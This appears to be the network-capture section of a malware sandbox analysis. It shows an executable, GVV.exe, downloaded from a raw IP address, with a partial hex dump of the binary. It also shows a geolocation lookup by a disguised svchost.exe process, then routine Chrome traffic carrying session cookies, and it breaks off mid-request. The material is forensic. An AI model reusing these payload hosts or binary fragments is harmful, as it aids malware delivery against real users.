Timestamp	Bytes transferred	Direction	Data
May 2, 2024 04:54:52.973706007 CEST	69	OUT	GET /GVV.exe HTTP/1.1 Connection: Keep-Alive Host: 23.94.54.101
May 2, 2024 04:54:53.083898067 CEST	1289	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Thu, 02 May 2024 08:28:48 GMT Accept-Ranges: bytes ETag: W/"4ca767c16a9cda1:0" Server: Microsoft-IIS/8.5 Date: Thu, 02 May 2024 02:54:52 GMT Content-Length: 1402368 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e5 c1 32 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 b6 0b 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL2f"w@@@@d\|@@u4@.text `.rdata@@.datalpH@.rsrc@@@.relocu@v@B [TRUNCATED]
May 2, 2024 04:54:53.083945990 CEST	1289	IN	Data Raw: 59 c3 68 f3 23 44 00 e8 83 f0 01 00 59 c3 e8 e6 de 01 00 68 f8 23 44 00 e8 72 f0 01 00 59 c3 e8 59 3c 00 00 68 fd 23 44 00 e8 61 f0 01 00 59 c3 51 e8 a9 00 00 00 68 02 24 44 00 e8 4f f0 01 00 59 c3 a1 30 14 4d 00 51 8b 40 04 05 30 14 4d 00 50 e8 Data Ascii: Yh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY^U80MtI3
May 2, 2024 04:54:53.084021091 CEST	1289	IN	Data Raw: c9 0f 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a 04 00 00 8d b7 64 fe ff ff 8b ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 01 00 59 8d 8f 8c fd ff ff e8 1b 02 00 00 8d 8f 7c fd ff ff e8 23 83 00 00 8d 8f 6c Data Ascii: O_`d<IvY\|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY9404
May 2, 2024 04:54:53.084146023 CEST	1289	IN	Data Raw: 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 08 00 8b 7f 38 eb d2 8b 40 38 eb ee 33 c0 c7 05 80 18 4d 00 64 00 00 00 33 c9 66 a3 32 15 4d 00 41 a2 34 15 4d 00 6a 0a 89 0d 38 15 4d 00 89 0d 3c 15 4d 00 89 0d 40 15 4d 00 a2 Data Ascii: C{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]UVuWVgFO GFGFGF aPF
May 2, 2024 04:54:53.193768978 CEST	1289	IN	Data Raw: 83 78 08 7f 0f 85 33 08 04 00 80 7d ff 00 8d 8e 64 01 00 00 75 1e 80 be 6d 01 00 00 00 8b 8e 68 01 00 00 75 16 8b 49 04 8b 45 0c 41 89 08 5f 5e c9 c2 08 00 e8 de 08 00 00 eb f3 8b 49 30 eb e5 55 8b ec 83 ec 18 83 65 ec 00 8d 45 ec 83 65 f4 00 56 Data Ascii: x3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)ttH9AxUSVu3WyQ>t(M@
May 2, 2024 04:54:53.193792105 CEST	1289	IN	Data Raw: fe ff ff 8b 41 04 6a 7f 59 66 39 48 08 0f 85 bc 05 04 00 8b 45 fc 48 4f 83 bd 6c ff ff ff 00 89 45 fc 0f 84 83 03 04 00 80 bd 75 ff ff ff 00 8b 45 c0 0f 85 7b 03 04 00 8b 18 8d 8d 6c ff ff ff e8 65 03 00 00 8b 85 70 ff ff ff 89 45 c0 8b 45 fc 85 Data Ascii: AjYf9HEHOlEuE{lepEE;&r8EE}TPGZEHXE!#AjYf9HmME@E0u]uEuuSPuW
May 2, 2024 04:54:53.193803072 CEST	1289	IN	Data Raw: 7d 0c 00 0f 85 a9 01 04 00 83 7d 10 00 75 34 83 7d 14 00 0f 85 b8 01 04 00 83 7d 18 00 0f 85 b7 01 04 00 83 7d 1c 00 0f 85 b6 01 04 00 83 7d 20 00 75 19 83 7d 24 00 0f 85 7e 01 04 00 33 c0 5d c2 20 00 6a ff 6a 77 e9 73 01 04 00 6a ff 6a 73 e9 6a Data Ascii: }}u4}}}} u}$~3] jjwsjjsjUVF}^W3jZQL>3YNF~F<BN$;\|SA23~,FDMEuNGA;\|u[_FMFMLU
May 2, 2024 04:54:53.193815947 CEST	1289	IN	Data Raw: 7b 00 00 ff 75 08 8d 4d 90 c7 45 a4 34 cc 49 00 89 5d a8 89 5d ac 89 5d b0 88 5d b4 e8 78 1c 00 00 8b 4d 0c be 18 14 4d 00 8a 45 b4 88 01 8b ce e8 db 0b 00 00 68 9c ca 49 00 8d 4d e0 e8 27 6e 00 00 6a 01 ff 35 18 14 4d 00 8d 4d b8 89 5d c4 89 5d Data Ascii: {uME4I]]]]xMMEhIM'nj5MM]]]& ]MiVMzEPM@hIMmSjEPEP/yMihtIME]EmSSEPEPxMEciMluM"z
May 2, 2024 04:54:53.193828106 CEST	1289	IN	Data Raw: 48 04 eb ee 55 8b ec b8 04 00 01 00 e8 ec eb 03 00 56 8d 45 fc 8b f2 50 8d 85 fc ff fe ff 50 68 ff 7f 00 00 ff 31 ff 15 68 c3 49 00 8b 45 fc 85 c0 74 05 33 c9 66 89 08 8d 8d fc ff fe ff e8 11 00 00 00 8d 85 fc ff fe ff 8b ce 50 e8 b3 37 00 00 5e Data Ascii: HUVEPPh1hIEt3fP7^VVYtf\|F\u3fLF^UVW3FO;Qu_^]USVWueYN3C;FPiq?PFuCP~3N_fH
May 2, 2024 04:54:53.193891048 CEST	1289	IN	Data Raw: 50 e8 de ea 01 00 83 c4 0c 39 9e 98 01 00 00 75 0b a1 e4 13 4d 00 89 86 98 01 00 00 39 9e a4 01 00 00 75 11 a1 e8 13 4d 00 89 86 a4 01 00 00 89 86 a8 01 00 00 39 9e b0 01 00 00 75 0b a1 ec 13 4d 00 89 86 b0 01 00 00 8d 9e a0 01 00 00 53 8d be 9c Data Ascii: P9uM9uM9uMSW[Md$$D$F@D$D$D$ qD$$=hMD$PjIhM_^[]U=hMVhL$#)=
May 2, 2024 04:54:53.193905115 CEST	1289	IN	Data Raw: 89 5f 08 89 5f 0c 89 5f 10 89 5f 14 89 5f 4c 66 89 1f e8 64 2a 00 00 8d 4f 28 e8 7a da ff ff 39 5f 58 0f 87 f6 f6 03 00 8d 4f 50 5f 5b e9 3e da ff ff 50 e8 77 c0 01 00 59 eb b9 55 8b ec 53 8b 5d 08 83 e3 01 f6 45 08 02 56 8b f1 0f 84 e9 f6 03 00 Data Ascii: _____Lfd*O(z9_XOP_[>PwYUS]EVWhA@~7jV&tQWYY_^[]VWj^$MZu MMrZMhZM^ZMTZMJZM@Z_M^4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49184	178.237.33.50	80	3680	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 04:57:13.480273008 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
May 2, 2024 04:57:13.649221897 CEST	1173	IN	HTTP/1.1 200 OK date: Thu, 02 May 2024 02:57:13 GMT server: Apache content-length: 965 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED] Data Ascii: { "geoplugin_request":"191.96.150.225", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49162	172.217.1.4	443	2960	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 02:56:03 UTC	330	OUT	GET /chrome/whats-new/m109?internal=true HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br
2024-05-02 02:56:04 UTC	686	IN	HTTP/1.1 404 Not Found Cross-Origin-Resource-Policy: cross-origin Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Accept-CH: Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-Motion Critical-CH: Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-Motion Vary: Accept-Encoding, Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-Motion Date: Thu, 02 May 2024 02:56:04 GMT Server: sffe Content-Length: 187622 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-02 02:56:04 UTC	569	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 20 69 65 39 20 64 69 72 2d 6c 74 72 22 20 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 20 69 65 38 20 64 69 72 2d 6c 74 72 22 20 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 20 69 65 37 20 64 69 72 2d 6c 74 72 22 20 20 6c 61 6e 67 3d 22 Data Ascii: <!DOCTYPE html>...[if IE 9 ]> <html class="no-js ie ie9 dir-ltr" lang="en" dir="ltr"> <![endif]-->...[if IE 8 ]> <html class="no-js ie ie8 dir-ltr" lang="en" dir="ltr"> <![endif]-->...[if IE 7 ]> <html class="no-js ie ie7 dir-ltr" lang="
2024-05-02 02:56:04 UTC	1255	IN	Data Raw: 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 6f 6f 6c 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 Data Ascii: "content-language" content="en-us"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link rel="preconnect" href="https://tools.google.com" > <link rel="preconnect" href="https://www.google-analytic
2024-05-02 02:56:04 UTC	1255	IN	Data Raw: 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 2f 63 68 72 6f 6d 65 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 20 68 72 65 66 3d 22 2f 63 68 72 6f 6d 65 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 78 39 36 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 Data Ascii: <link rel="shortcut icon" type="image/png" sizes="32x32" href="/chrome/static/images/favicons/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="96x96" href="/chrome/static/images/favicons/favicon-96x96.png"> <link r
2024-05-02 02:56:04 UTC	1255	IN	Data Raw: 63 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 61 70 70 6c 65 2d 69 63 6f 6e 2d 31 34 34 78 31 34 34 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 35 32 78 31 35 32 22 20 68 72 65 66 3d 22 2f 63 68 72 6f 6d 65 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 61 70 70 6c 65 2d 69 63 6f 6e 2d 31 35 32 78 31 35 32 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 Data Ascii: c/images/favicons/apple-icon-144x144.png"> <link rel="apple-touch-icon" type="image/png" sizes="152x152" href="/chrome/static/images/favicons/apple-icon-152x152.png"> <link rel="apple-touch-icon" type="image/png" sizes="180x180" hr
2024-05-02 02:56:04 UTC	1255	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 68 72 6f 6d 65 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 63 68 72 6f 6d 65 2d 6c 6f 67 6f 2e 73 76 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 3e 20 20 3c 21 2d 2d 5b 69 66 20 28 67 74 65 20 49 45 20 31 30 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 20 3c 73 63 72 69 70 74 3e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 64 65 78 4f 66 28 27 4d 53 49 45 20 31 30 2e 30 27 29 20 3d 3d 3d 20 2d 31 Data Ascii: <meta property="og:image" content="https://www.google.com/chrome/static/images/chrome-logo.svg"> <meta property="og:locale" content="en_US"> ...[if (gte IE 10)\|!(IE)]>...> <script>navigator.userAgent.indexOf('MSIE 10.0') === -1
2024-05-02 02:56:04 UTC	1255	IN	Data Raw: 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 6a 73 2f 67 77 65 62 2f 61 6e 61 6c 79 74 69 63 73 2f 61 75 74 6f 74 72 61 63 6b 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 76 61 72 20 67 61 43 6f 6f 6b 69 65 50 61 74 68 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 2f 63 68 72 6f 6d 65 2f 22 29 20 2b 20 38 29 3b 0a 20 20 77 69 6e 64 6f 77 2e 67 61 20 3d 20 6e 65 77 20 67 77 65 62 2e 61 6e 61 6c 79 74 69 63 73 2e 41 75 74 6f 54 72 61 63 6b 28 7b 0a 20 20 20 20 70 72 6f 66 69 6c 65 3a 20 27 55 41 Data Ascii: rc="//www.google.com/js/gweb/analytics/autotrack.js"></script> <script> var gaCookiePath = window.location.pathname.substring(0, window.location.pathname.indexOf("/chrome/") + 8); window.ga = new gweb.analytics.AutoTrack({ profile: 'UA
2024-05-02 02:56:04 UTC	1255	IN	Data Raw: 65 72 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 3b 6d 61 72 67 69 6e 3a 30 2e 36 37 65 6d 20 30 7d 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 31 65 6d 20 34 30 70 78 7d 68 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 6d 61 69 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 70 72 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 20 6d 6f 6e 6f 73 70 61 63 65 Data Ascii: er,nav,section{display:block}h1{font-size:2em;margin:0.67em 0}figcaption,figure{display:block}figure{margin:1em 40px}hr{-webkit-box-sizing:content-box;box-sizing:content-box;height:0;overflow:visible}main{display:block}pre{font-family:monospace, monospace
2024-05-02 02:56:04 UTC	1255	IN	Data Raw: 62 6d 69 74 22 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 7d 62 75 74 74 6f 6e 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 20 42 75 74 74 6f 6e 54 65 78 74 7d 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 2c 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 7b 2d 77 Data Ascii: bmit"]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusring,[type="button"]:-moz-focusring,[type="reset"]:-moz-focusring,[type="submit"]:-moz-focusring{outline:1px dotted ButtonText}input{overflow:visible}[type="checkbox"],[type="radio"]{-w
2024-05-02 02:56:04 UTC	1255	IN	Data Raw: 64 2d 6c 69 6e 6b 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 63 68 72 2d 6d 6f 64 61 6c 2e 73 68 6f 77 2c 2e 63 68 72 2d 6d 6f 64 61 6c 20 2e 73 68 6f 77 2c 2e 63 68 61 6e 6e 65 6c 2d 70 61 67 65 20 2e 63 68 72 2d 64 6f 77 6e 6c 6f 61 64 2d 6c 69 6e 6b 2e 73 68 6f 77 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 63 61 72 64 2d 66 61 64 65 2d 75 70 7b 66 72 6f 6d 7b 6f 70 61 63 69 74 79 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 38 30 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 38 30 70 78 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f Data Ascii: d-link{display:none}.chr-modal.show,.chr-modal .show,.channel-page .chr-download-link.show{display:block !important}@-webkit-keyframes card-fade-up{from{opacity:0;-webkit-transform:translateY(-80px);transform:translateY(-80px)}to{opacity:1;-webkit-transfo
2024-05-02 02:56:04 UTC	1255	IN	Data Raw: 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 70 78 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 6f 75 74 2d 64 6f 77 6e 7b 66 72 6f 6d 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 30 3b 2d Data Ascii: :0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes fade-out-down{from{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49166	172.217.1.4	443	2960	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 02:56:04 UTC	837	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIlqHLAQiFoM0BCNy9zQEIuMjNAQ== Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA
